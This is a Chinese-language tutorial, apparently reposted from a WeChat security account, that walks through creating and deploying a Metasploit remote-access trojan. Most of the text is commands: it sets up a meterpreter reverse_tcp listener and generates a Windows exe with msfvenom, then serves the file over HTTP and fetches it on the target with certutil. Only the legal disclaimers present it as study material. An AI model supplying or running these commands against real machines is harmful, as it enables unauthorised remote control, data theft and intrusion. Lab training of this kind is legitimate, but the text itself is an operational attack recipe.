声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!
一、msf木马配置
1、更新kali资源
apt-get update
#更新软件包信息数据库
apt-get upgrade
#升级已安装软件包到最新兼容版本
2、启动msf(不显示加载信息)
msfconsole -q #不显示加载信息
下图为显示加载信息跟不显示加载信息的对比
3、msf配置监听信息
use exploit/multi/handler
#进入模块
show options
#查看有什么参数需要填写
set lhost 192.168.60.128
#设置本机ip
set lport 4444
#设置本机监听端口
4、msf配置payload信息开启监听
show payloads
#太多了 我们这里选择常用的
set payload windows/meterpreter/reverse_tcp
#设置payload
run
#执行监听
5、生成木马
msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 --platform windows -o ./meter_re_tcp_x86.exe LHOST=192.168.60.128 LPORT=4444
#-f #指定文件格式 exe等等
msfvenom -l formats
# 如果我们想知道它有什么格式我们可以msfvenom -l formats
#-a #指定架构的意思
msfvenom -l archs
#查看所有msf支持的架构
#--platform 指定平台的意思
msfvenom -l platforms
#查看所有支持的平台
二、靶机运行木马
1、开启http微服务
python -m http.server 8008
#远控程序生成路径下开启web微服务
2、靶机下载远控程序
通过cmd下载
certutil -urlcache -split -f "http://192.168.60.128:8008/" meter_re_tcp_x86.exe
3、运行靶机的远控程序
三、msf上线
原文始发于微信公众号(泷羽SEC-ohh):metasploit(1) 生成远控木马
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论